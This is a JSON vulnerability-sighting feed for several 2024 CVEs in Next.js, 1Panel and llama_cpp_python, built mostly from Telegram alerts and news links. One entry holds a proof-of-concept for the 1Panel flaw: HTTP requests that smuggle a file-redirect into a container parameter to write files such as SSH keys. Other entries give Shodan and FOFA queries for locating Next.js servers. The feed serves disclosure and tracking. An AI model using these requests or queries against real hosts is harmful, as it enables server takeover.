{"vulnerability": "cve-2024-3435", "sightings": [{"uuid": "1d575d51-31e4-4333-964e-4828f5ab0187", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "seen", "source": "https://gist.github.com/parameciumzhang/6f62cee5cf4bf3d4531636d086d5418e", "content": "", "creation_timestamp": "2025-12-12T03:37:29.000000Z"}, {"uuid": "3e093856-26b4-4370-9d70-cccedc688f10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "seen", "source": "https://gist.github.com/tuannguyenx2024/8e367a0089f96d8a24996b10f608c5b3", "content": "", "creation_timestamp": "2026-02-10T16:39:07.000000Z"}, {"uuid": "0c87a9cb-3c4d-4fe9-99d9-c787ebe60083", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "https://bsky.app/profile/yayafa.bsky.social/post/3mizefczwon2g", "content": "", "creation_timestamp": "2026-04-08T22:40:35.776440Z"}, {"uuid": "f095ae9f-7c88-4d98-8606-0bb0edefae3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "Telegram/0XIhWL9u3TURRxPZwtlJOta_6VFGTrjK73IsDBt66QftRWM", "content": "", "creation_timestamp": "2024-05-21T13:45:57.000000Z"}, {"uuid": "7584da72-0410-4f89-83e5-99187d10db2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "published-proof-of-concept", "source": "https://t.me/hackingbra/126", "content": "\ud83d\udea8Alert\ud83d\udea8CVE-2024-34351:Next.js Server-Side Request Forgery in Server Actions\n\ud83d\udd25PoC: https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps#/ \n\u26a0A SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.\n\ud83d\udcca3.1M+ Services are found on  hunter.how\n\ud83d\udd17Hunter Link: https://hunter.how/list?searchValue=product.name%3D%22Next.js%22 \n\ud83d\udcf0Refer: https://github.com/advisories/GHSA-fr5h-rqp8-mj6g \nHunter:/product.name=\"Next.js\"\nFOFA:app=\"Next.js\"\nSHODAN:http.component:\"Next.js\"", "creation_timestamp": "2024-05-10T12:42:38.000000Z"}, {"uuid": "e938c068-daae-4708-abb7-e97d977f63ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8331", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC for a full exploitation of NextJS SSRF (CVE-2024-34351) \nURL\uff1ahttps://github.com/God4n/nextjs-CVE-2024-34351-_exploit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-22T19:26:38.000000Z"}, {"uuid": "f550292d-6cfc-41f3-9e88-917514d26643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34352", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3798", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-34352\n\ud83d\udd25 CVSS Score: 6.4 (CVSS_V3)\n\ud83d\udd39 Description: ### Summary\nThere are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.\nWe can use the following mirror configuration write symbol `>` to achieve arbitrary file writing\n\n### PoC\nDockerfile\n```\nFROM bash:latest\n\nCOPY echo.sh /usr/local/bin/echo.sh\nRUN chmod +x /usr/local/bin/echo.sh\nCMD [\"echo.sh\"]\n```\necho.sh\n```\n#!/usr/local/bin/bash\necho \"Hello, World!\"\n```\nBuild this image like this, upload it to dockerhub, and then 1panel pulls the image to build the container\nSend the following packet, taking care to change the containerID to the malicious container we constructed\n\n```\nGET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Ftmp%2F1&since=all&tail=100&follow=true HTTP/1.1\nHost: xxxx:42713\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\nUpgrade: websocket\nOrigin: http://xxx:42713\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d\nSec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==\n```\nThen you can write any customized file to, for example, a ssh key, and generally the application is run with root privileges\n```\nGET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Froot%2F.ssh%2f1&since=all&tail=100&follow=true HTTP/1.1\nHost: xxx:42713\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\nUpgrade: websocket\nOrigin: http://xxx:42713\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d\nSec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==\n```\nOr write a timed task to execute any command.\n### Impact\nThe ability to write arbitrary files on the host where the service is deployed can lead to a host takeover\n\ud83d\udccf Published: 2024-05-09T15:14:24Z\n\ud83d\udccf Modified: 2025-02-07T17:47:10Z\n\ud83d\udd17 References:\n1. https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-34352\n3. https://github.com/1Panel-dev/1Panel\n4. https://pkg.go.dev/vuln/GO-2024-2830", "creation_timestamp": "2025-02-07T18:02:55.000000Z"}, {"uuid": "d1ffae24-da20-4845-a533-16e53758b0bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "Telegram/z1FmJvv5udIO3Zoz4PeB3fN7DcS1aeKuhlIf4800DCXKBA", "content": "", "creation_timestamp": "2024-05-21T15:53:31.000000Z"}, {"uuid": "2f80159d-ccc9-46e3-b1c3-769f29ba710a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4009", "content": "\ud83d\udea8Alert\ud83d\udea8CVE-2024-34351:Next.js Server-Side Request Forgery in Server Actions\n\ud83d\udd25PoC: https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps#/ \n\u26a0A SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.\n\ud83d\udcca3.1M+ Services are found on  hunter.how\n\ud83d\udd17Hunter Link: https://hunter.how/list?searchValue=product.name%3D%22Next.js%22 \n\ud83d\udcf0Refer: https://github.com/advisories/GHSA-fr5h-rqp8-mj6g \nHunter:/product.name=\"Next.js\"\nFOFA:app=\"Next.js\"\nSHODAN:http.component:\"Next.js\"\n#NextJS #SSRF #Vulnerability", "creation_timestamp": "2024-05-10T12:02:39.000000Z"}, {"uuid": "1d5c6ac8-3e38-45ba-abe6-b666bb04d453", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34350", "type": "seen", "source": "https://t.me/cyberbannews_ir/11846", "content": "\ud83e\ude99 \u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Request Smuggling \u0648 SSRF \u062f\u0631 Next.js\n\n\ud83d\udd39\u062f\u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647\u200c\u0647\u0627\u06cc CVE-2024-34350 \u0648 CVE-2024-34351 \u0648 \u0634\u062f\u062a\u200c\u0647\u0627\u06cc \u0628\u0627\u0644\u0627 \u062f\u0631 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc Next.js \u06a9\u0634\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f \u06a9\u0647 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Response queue poisoning \u0648 SSRF \u0645\u06cc\u200c\u0628\u0627\u0634\u0646\u062f.\n\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Response queue poisoning \u0628\u0647 \u062f\u0644\u06cc\u0644 \u062a\u0641\u0633\u06cc\u0631 \u0646\u0627\u0633\u0627\u0632\u06af\u0627\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc HTTP \u0628\u0647 \u0648\u062c\u0648\u062f \u0622\u0645\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u06af\u0627\u0647\u06cc \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0648 \u06af\u0627\u0647\u06cc \u062f\u0648 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u062c\u062f\u0627\u06af\u0627\u0646\u0647 \u062a\u0641\u0633\u06cc\u0631 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f. \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc SSRF \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0645\u0648\u0644\u0641\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u062f\u0631 Next.js \u0627\u06cc\u062c\u0627\u062f \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0637\u0648\u0631 \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0641\u0639\u0627\u0644 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f.\n\n\ud83d\udd18 \u06af\u0632\u0627\u0631\u0634 \u06a9\u0627\u0645\u0644 \n\n#\u0622\u0633\u06cc\u0628_\u067e\u0630\u06cc\u0631\u06cc\n\n\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\n\ud83e\udda0 @cyberbannews_ir", "creation_timestamp": "2024-05-13T08:31:07.000000Z"}, {"uuid": "0a0ef3e2-90e0-4c06-9caf-354a647f53e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "seen", "source": "https://t.me/cyberbannews_ir/11846", "content": "\ud83e\ude99 \u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Request Smuggling \u0648 SSRF \u062f\u0631 Next.js\n\n\ud83d\udd39\u062f\u0648 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647\u200c\u0647\u0627\u06cc CVE-2024-34350 \u0648 CVE-2024-34351 \u0648 \u0634\u062f\u062a\u200c\u0647\u0627\u06cc \u0628\u0627\u0644\u0627 \u062f\u0631 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc Next.js \u06a9\u0634\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f \u06a9\u0647 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Response queue poisoning \u0648 SSRF \u0645\u06cc\u200c\u0628\u0627\u0634\u0646\u062f.\n\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc Response queue poisoning \u0628\u0647 \u062f\u0644\u06cc\u0644 \u062a\u0641\u0633\u06cc\u0631 \u0646\u0627\u0633\u0627\u0632\u06af\u0627\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc HTTP \u0628\u0647 \u0648\u062c\u0648\u062f \u0622\u0645\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u06af\u0627\u0647\u06cc \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0648 \u06af\u0627\u0647\u06cc \u062f\u0648 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u062c\u062f\u0627\u06af\u0627\u0646\u0647 \u062a\u0641\u0633\u06cc\u0631 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f. \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc SSRF \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0645\u0648\u0644\u0641\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u062f\u0631 Next.js \u0627\u06cc\u062c\u0627\u062f \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0637\u0648\u0631 \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0641\u0639\u0627\u0644 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f.\n\n\ud83d\udd18 \u06af\u0632\u0627\u0631\u0634 \u06a9\u0627\u0645\u0644 \n\n#\u0622\u0633\u06cc\u0628_\u067e\u0630\u06cc\u0631\u06cc\n\n\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\ud83d\udd38\n\ud83e\udda0 @cyberbannews_ir", "creation_timestamp": "2024-05-13T08:31:07.000000Z"}, {"uuid": "ffc90787-ef10-408e-8ac7-14f9180e9aac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "https://t.me/HackingInsights/725", "content": "\u200aCVE-2024-34359: Critical Vulnerability in AI Integration Package Threatens Data Security\n\nhttps://securityonline.info/cve-2024-34359-critical-vulnerability-in-ai-integration-package-threatens-data-security/", "creation_timestamp": "2024-05-21T15:29:59.000000Z"}, {"uuid": "4ebc7eb4-2be8-49b3-986d-9208467ddb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "seen", "source": "https://t.me/MrVGunz/1105", "content": "CVE-2024-34351:Next.js Server-Side Request Forgery in Server Actions\n\nA SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.\n\n\ud83c\udfaf Poc\n\ud83d\udcda Refer\n\n\ud83d\udd39\ufe0f @hack_authenticator", "creation_timestamp": "2024-05-12T15:41:34.000000Z"}, {"uuid": "f3e55db2-1932-43e3-afbb-48b8885acf23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/8206", "content": "The Hacker News\nResearchers Uncover Flaws in Python Package for AI Models and PDF.js Used by Firefox\n\nA critical security flaw has been disclosed in the llama_cpp_python Python package that could be exploited by threat actors to achieve arbitrary code execution.\nTracked as CVE-2024-34359 (CVSS score: 9.7), the flaw has been codenamed Llama Drama by software supply chain security firm Checkmarx.\n\"If exploited, it could allow attackers to execute arbitrary code on your system,", "creation_timestamp": "2024-05-21T15:53:31.000000Z"}, {"uuid": "418937a3-1176-478e-bf7b-9d8b056ef707", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "https://t.me/KomunitiSiber/1975", "content": "Researchers Uncover Flaws in Python Package for AI Models and PDF.js Used by Firefox\nhttps://thehackernews.com/2024/05/researchers-uncover-flaws-in-python.html\n\nA critical security flaw has been disclosed in the\u00a0llama_cpp_python\u00a0Python package that could be exploited by threat actors to achieve arbitrary code execution.\nTracked as\u00a0CVE-2024-34359\u00a0(CVSS score: 9.7), the flaw has been codenamed Llama Drama by software supply chain security firm Checkmarx.\n\"If exploited, it could allow attackers to execute arbitrary code on your system,", "creation_timestamp": "2024-05-21T13:16:03.000000Z"}, {"uuid": "c75f9f8f-157c-49c8-93e7-8524f9dc1f3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/582", "content": "\u200aLlama Drama: Critical Vulnerability CVE-2024-34359 Threatening Your Software Supply Chain\n\nhttps://malware.news/t/llama-drama-critical-vulnerability-cve-2024-34359-threatening-your-software-supply-chain/82030", "creation_timestamp": "2024-05-17T08:03:06.000000Z"}, {"uuid": "888b9124-e060-4253-a08d-6928e9d9ff61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34350", "type": "seen", "source": "https://t.me/HackingInsights/286", "content": "\u200aCVE-2024-34350 & CVE-2024-34351: Two Vulnerabilities Patched in Popular Next.js Framework\n\nhttps://securityonline.info/cve-2024-34350-cve-2024-34351-two-vulnerabilities-patched-in-popular-next-js-framework/", "creation_timestamp": "2024-05-11T10:13:49.000000Z"}, {"uuid": "92d10bc8-bd29-4371-b42e-3b2676b69b95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "seen", "source": "https://t.me/HackingInsights/286", "content": "\u200aCVE-2024-34350 & CVE-2024-34351: Two Vulnerabilities Patched in Popular Next.js Framework\n\nhttps://securityonline.info/cve-2024-34350-cve-2024-34351-two-vulnerabilities-patched-in-popular-next-js-framework/", "creation_timestamp": "2024-05-11T10:13:49.000000Z"}, {"uuid": "21840df4-3b39-47e0-87ee-47c22b38800a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "Telegram/lFwPID8s5MkrDhyGFaDaCmiOcjcPEN6HyJS_VbQy0kvXmopB", "content": "", "creation_timestamp": "2024-05-26T16:56:11.000000Z"}, {"uuid": "a4a03ba0-a4b4-494e-8069-18939de050a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "Telegram/HnfBiLwo399C-z0d0q2TTUydlA9C_nLqDy3NCxdivPLF0Q", "content": "", "creation_timestamp": "2024-05-21T13:24:46.000000Z"}, {"uuid": "c8c34b4d-ca8f-40a5-82e5-24f066264356", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/1523", "content": "The Hacker News\nResearchers Uncover Flaws in Python Package for AI Models and PDF.js Used by Firefox\n\nA critical security flaw has been disclosed in the llama_cpp_python Python package that could be exploited by threat actors to achieve arbitrary code execution.\nTracked as CVE-2024-34359 (CVSS score: 9.7), the flaw has been codenamed Llama Drama by software supply chain security firm Checkmarx.\n\"If exploited, it could allow attackers to execute arbitrary code on your system,", "creation_timestamp": "2024-05-21T15:53:31.000000Z"}, {"uuid": "210697d4-b407-4255-ba47-56f5bd6f42f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34359", "type": "seen", "source": "https://t.me/information_security_channel/52213", "content": "Critical Flaw in AI Python Package Can Lead to System and Data Compromise\nhttps://www.securityweek.com/critical-flaw-in-ai-python-package-can-lead-to-system-and-data-compromise/\n\nA critical vulnerability tracked as CVE-2024-34359 and dubbed Llama Drama can allow hackers to target AI product developers.\nThe post Critical Flaw in AI Python Package Can Lead to System and Data Compromise (https://www.securityweek.com/critical-flaw-in-ai-python-package-can-lead-to-system-and-data-compromise/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-05-17T15:53:40.000000Z"}, {"uuid": "88ed1403-a5d1-44be-a065-4f31e8d55b8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34351", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2494", "content": "https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps\n\nCVE-2024-34351\n#\u5206\u6790 #poc", "creation_timestamp": "2024-05-15T21:48:21.000000Z"}, {"uuid": "e110d510-118a-48da-9a35-97c9575d236f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-34352", "type": "published-proof-of-concept", "source": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847", "content": "", "creation_timestamp": "2024-05-09T14:06:03.000000Z"}]}